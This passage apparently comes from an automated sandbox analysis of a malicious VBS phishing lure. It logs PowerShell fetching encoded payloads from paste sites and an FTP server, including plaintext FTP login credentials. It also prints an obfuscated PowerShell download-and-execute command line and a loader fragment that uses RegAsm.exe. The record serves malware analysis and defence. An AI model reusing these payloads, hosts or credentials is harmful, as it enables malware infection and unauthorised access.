2024-09-24 21:42:07 UTC	1620	IN	Data Raw: e2 86 93 2f 4e 6d 43 2b 71 42 62 39 4e 6c 33 6b 76 55 4d 78 63 66 34 65 67 65 35 75 48 35 43 47 55 2f 6d 6c 4d 46 61 48 63 6a 65 2b 65 4d 54 4c 51 30 37 59 4c 2f 50 46 38 52 51 36 63 7a 32 56 71 42 6a 49 52 79 53 4a 65 6c 74 4b 44 6d 6e 48 42 35 4b 4f 51 54 4f 2f 69 6e 51 4a 4f 35 70 2b 50 74 e2 86 93 3a e2 86 93 4d 2f 31 4f 52 77 2f 33 71 78 4d 54 56 37 59 6c 52 71 53 66 35 35 52 38 31 72 7a 58 32 68 6c 44 79 2f 53 35 46 6f 39 39 52 59 75 49 6a 78 59 52 4b 59 62 42 68 69 64 78 50 43 4c 39 63 70 79 34 6e 61 76 48 69 6c 47 4e 71 58 39 52 32 71 4f 76 63 49 62 32 6c 42 79 36 78 79 71 31 62 6a 49 34 55 62 76 38 57 45 72 45 70 72 33 47 48 4e 6b 55 7a 65 33 58 66 46 6b 72 67 34 37 30 46 36 71 51 71 79 47 39 69 63 52 52 48 51 4a 49 2b 58 64 63 4f 70 78 4f 61 32 Data Ascii: /NmC+qBb9Nl3kvUMxcf4ege5uH5CGU/mlMFaHcje+eMTLQ07YL/PF8RQ6cz2VqBjIRySJeltKDmnHB5KOQTO/inQJO5p+Pt:M/1ORw/3qxMTV7YlRqSf55R81rzX2hlDy/S5Fo99RYuIjxYRKYbBhidxPCL9cpy4navHilGNqX9R2qOvcIb2lBy6xyq1bjI4Ubv8WErEpr3GHNkUze3XfFkrg470F6qQqyG9icRRHQJI+XdcOpxOa2
2024-09-24 21:42:07 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	76.76.21.22	443	1088	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:09 UTC	96	OUT	GET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1 Host: pastecodeapp.vercel.app
2024-09-24 21:42:10 UTC	463	IN	HTTP/1.1 200 OK Age: 0 Cache-Control: public, max-age=0, must-revalidate Content-Type: text/plain;charset=UTF-8 Date: Tue, 24 Sep 2024 21:42:10 GMT Server: Vercel Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch X-Matched-Path: /pastes/[id]/raw X-Vercel-Cache: MISS X-Vercel-Id: iad1::fra1::cj2lv-1727214129996-c132124cacc7 Connection: close Transfer-Encoding: chunked
2024-09-24 21:42:10 UTC	2372	IN	Data Raw: 34 30 30 30 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: 4000TVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
2024-09-24 21:42:10 UTC	1724	IN	Data Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 Data Ascii: :::I:::C:::::::::::::::CC:::Eg::::::::::::
2024-09-24 21:42:10 UTC	4744	IN	Data Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f 65 e2 86 93 3a e2 86 93 69 67 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 68 34 43 4b e2 86 93 3a e2 86 93 4d e2 86 Data Ascii: ::::::::::::::::::::::::::BooS:::Bioe:igB:::KKh4CK:M
2024-09-24 21:42:10 UTC	5930	IN	Data Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 6a 30 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 7a 2b 46 52 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 58 4b 39 38 53 44 66 34 56 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 68 67 72 31 42 49 4d 30 42 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 6f 44 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 36 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 44 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 Data Ascii: :::Q::::Gw:::Dj0:w::Egz+FRY:::IXK98SDf4VFQ:::hgr1BIM0BY:::IoDw::Cig6:::KKDs::
2024-09-24 21:42:10 UTC	1620	IN	Data Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 74 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 69 68 5a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 43 78 63 72 34 78 59 4d 43 e2 86 93 3a e2 86 93 65 4f 61 66 34 45 4c 43 34 48 43 e2 86 93 3a e2 86 93 63 49 6b 77 30 4a 49 50 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 66 42 69 55 58 57 e2 86 93 3a e2 86 93 70 68 48 6d 49 4a 48 6d 4d 47 4a 52 64 59 43 6d 48 53 59 4e 47 64 47 43 75 30 43 42 64 59 44 42 6b 72 72 53 76 4b 42 33 4e 61 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 Data Ascii: :::M::::Ow:::Ct::ihZ:::KCxcr4xYMC:eOaf4ELC4HC:cIkw0JIP8:::BfBiUXW:phHmIJHmMGJRdYCmHSYNGdGCu0CBdYDBkrrSvKB3Na:::
2024-09-24 21:42:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-24 21:42:10 UTC	4096	IN	Data Raw: 34 30 30 30 0d 0a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 67 43 49 e2 86 93 3a e2 86 93 71 51 49 42 67 44 38 42 32 67 49 43 67 44 34 e2 86 93 3a e2 86 93 6f 55 46 43 67 44 56 e2 86 93 3a e2 86 93 6f 55 46 44 67 42 76 43 67 38 47 42 67 43 71 42 36 51 49 44 67 e2 86 93 3a e2 86 93 38 42 67 38 47 44 67 e2 86 93 3a e2 86 93 6c 43 68 51 4a 44 67 42 62 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 38 47 44 67 42 6d e2 86 93 3a e2 86 93 67 38 47 44 67 44 46 e2 86 93 3a e2 86 93 51 38 47 44 67 e2 86 93 3a e2 86 93 6e 43 e2 86 93 3a e2 86 93 38 47 42 67 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 46 73 46 44 67 42 75 42 7a 51 4a 44 67 e2 86 93 3a e2 86 93 59 42 38 6b 47 44 67 43 44 43 2b 6f 47 43 67 43 59 e2 86 93 3a e2 86 93 72 51 47 43 67 43 6a e2 86 93 3a e2 Data Ascii: 4000::BgCI:qQIBgD8B2gICgD4:oUFCgDV:oUFDgBvCg8GBgCqB6QIDg:8Bg8GDg:lChQJDgBb::8GDgBm:g8GDgDF:Q8GDg:nC:8GBg:B:FsFDgBuBzQJDg:YB8kGDgCDC+oGCgCY:rQGCgCj:
2024-09-24 21:42:10 UTC	10674	IN	Data Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 52 67 33 43 4d 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 43 46 49 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 47 44 45 49 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 45 67 6e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4e e2 86 93 3a e2 86 93 77 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 53 42 Data Ascii: ::::ERg3CMY::gCFIg:::::GGDEI:Q:C::::::C::BEgn::N:wI::::::I::ESB
2024-09-24 21:42:10 UTC	1620	IN	Data Raw: e2 86 93 e2 86 93 3a e2 86 93 59 48 79 e2 86 93 3a e2 86 93 48 78 e2 86 93 3a e2 86 93 54 45 49 7a 51 48 35 e2 86 93 3a e2 86 93 54 45 49 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 4a e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 5a e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 68 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 70 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 6a 45 49 30 67 45 35 e2 86 93 3a e2 86 93 6a 45 49 33 51 42 42 e2 86 93 3a e2 86 93 6a 45 49 33 51 42 4a e2 86 93 3a e2 86 93 6a 45 49 33 51 42 52 e2 86 93 3a e2 86 93 6a 45 49 e2 86 93 3a e2 86 93 Data Ascii: :YHy:Hx:TEIzQH5:TEI:Q:B:jEI3Q:J:jEI3Q:R:jEI3Q:Z:jEI3Q:h:jEI3Q:p:jEI3Q:x:jEI0gE5:jEI3QBB:jEI3QBJ:jEI3QBR:jEI:
2024-09-24 21:42:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	76.76.21.22	443	1088	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:13 UTC	96	OUT	GET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1 Host: pastecodeapp.vercel.app
2024-09-24 21:42:13 UTC	463	IN	HTTP/1.1 200 OK Age: 0 Cache-Control: public, max-age=0, must-revalidate Content-Type: text/plain;charset=UTF-8 Date: Tue, 24 Sep 2024 21:42:13 GMT Server: Vercel Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch X-Matched-Path: /pastes/[id]/raw X-Vercel-Cache: MISS X-Vercel-Id: iad1::fra1::sxbwt-1727214133524-72ee29530da8 Connection: close Transfer-Encoding: chunked
2024-09-24 21:42:13 UTC	548	IN	Data Raw: 32 31 64 0d 0a 24 64 71 73 78 42 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 52 65 67 41 73 6d 2e 65 78 65 27 3b 0a 0a 24 66 56 4c 46 55 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 6a 75 4e 6d 51 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 6d 5a 69 6f 61 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61 Data Ascii: 21d$dqsxB = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'RegAsm.exe';$fVLFU = ':';$juNmQ = 'A';$WYvtt = '%qlxKP%'.replace( $fVLFU, $juNmQ );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );$mZioa = '%nkGMv%'.repla
2024-09-24 21:42:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	104.20.4.235	443	5792	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:16 UTC	74	OUT	GET /raw/pQQ0n3eA HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-24 21:42:16 UTC	391	IN	HTTP/1.1 200 OK Date: Tue, 24 Sep 2024 21:42:16 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT Server: cloudflare CF-RAY: 8c85f17e9b5817ed-EWR
2024-09-24 21:42:16 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-09-24 21:42:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	56146	104.20.4.235	443	7428	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:25 UTC	74	OUT	GET /raw/pQQ0n3eA HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-24 21:42:25 UTC	395	IN	HTTP/1.1 200 OK Date: Tue, 24 Sep 2024 21:42:25 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 9 Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT Server: cloudflare CF-RAY: 8c85f1b89c117d05-EWR
2024-09-24 21:42:25 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-09-24 21:42:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	56147	104.20.4.235	443	7656	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-24 21:42:33 UTC	74	OUT	GET /raw/pQQ0n3eA HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-24 21:42:33 UTC	396	IN	HTTP/1.1 200 OK Date: Tue, 24 Sep 2024 21:42:33 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 17 Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT Server: cloudflare CF-RAY: 8c85f1eca98f42ec-EWR
2024-09-24 21:42:33 UTC	11	IN	Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a Data Ascii: 6false,
2024-09-24 21:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 24, 2024 23:42:04.252587080 CEST	21	49704	191.252.83.213	192.168.2.5	220 "Servico de FTP da Locaweb"
Sep 24, 2024 23:42:04.253403902 CEST	49704	21	192.168.2.5	191.252.83.213	USER desckvbrat1
Sep 24, 2024 23:42:04.474591017 CEST	21	49704	191.252.83.213	192.168.2.5	331 Username ok, send password.
Sep 24, 2024 23:42:04.474827051 CEST	49704	21	192.168.2.5	191.252.83.213	PASS developerpro21578Jp@@
Sep 24, 2024 23:42:04.705015898 CEST	21	49704	191.252.83.213	192.168.2.5	230 Login successful.
Sep 24, 2024 23:42:04.925755978 CEST	21	49704	191.252.83.213	192.168.2.5	501 Invalid argument.
Sep 24, 2024 23:42:04.925973892 CEST	49704	21	192.168.2.5	191.252.83.213	PWD
Sep 24, 2024 23:42:05.146946907 CEST	21	49704	191.252.83.213	192.168.2.5	257 "/" is the current directory.
Sep 24, 2024 23:42:05.147140980 CEST	49704	21	192.168.2.5	191.252.83.213	TYPE I
Sep 24, 2024 23:42:05.369565964 CEST	21	49704	191.252.83.213	192.168.2.5	200 Type set to: Binary.
Sep 24, 2024 23:42:05.369791031 CEST	49704	21	192.168.2.5	191.252.83.213	PASV
Sep 24, 2024 23:42:05.598150015 CEST	21	49704	191.252.83.213	192.168.2.5	227 Entering passive mode (191,252,83,213,238,45).
Sep 24, 2024 23:42:05.606169939 CEST	49704	21	192.168.2.5	191.252.83.213	RETR Upcrypter/01/DLL01.txt
Sep 24, 2024 23:42:05.841496944 CEST	21	49704	191.252.83.213	192.168.2.5	150 File status okay. About to open data connection.
Sep 24, 2024 23:42:06.241117954 CEST	21	49704	191.252.83.213	192.168.2.5	226 Transfer complete.
Sep 24, 2024 23:42:08.558604956 CEST	49704	21	192.168.2.5	191.252.83.213	PASV
Sep 24, 2024 23:42:08.779620886 CEST	21	49704	191.252.83.213	192.168.2.5	227 Entering passive mode (191,252,83,213,235,180).
Sep 24, 2024 23:42:08.785200119 CEST	49704	21	192.168.2.5	191.252.83.213	RETR Upcrypter/01/Rumpe.txt
Sep 24, 2024 23:42:09.006505966 CEST	21	49704	191.252.83.213	192.168.2.5	150 File status okay. About to open data connection.
Sep 24, 2024 23:42:09.401283979 CEST	21	49704	191.252.83.213	192.168.2.5	226 Transfer complete.
Sep 24, 2024 23:42:12.080056906 CEST	49704	21	192.168.2.5	191.252.83.213	PASV
Sep 24, 2024 23:42:12.301886082 CEST	21	49704	191.252.83.213	192.168.2.5	227 Entering passive mode (191,252,83,213,235,166).
Sep 24, 2024 23:42:12.307770967 CEST	49704	21	192.168.2.5	191.252.83.213	RETR Upcrypter/01/Entry.txt
Sep 24, 2024 23:42:12.532241106 CEST	21	49704	191.252.83.213	192.168.2.5	150 File status okay. About to open data connection.
Sep 24, 2024 23:42:12.946691990 CEST	21	49704	191.252.83.213	192.168.2.5	226 Transfer complete.

Target ID:	0
Start time:	17:41:58
Start date:	24/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
Imagebase:	0x7ff692c80000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:41:59
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???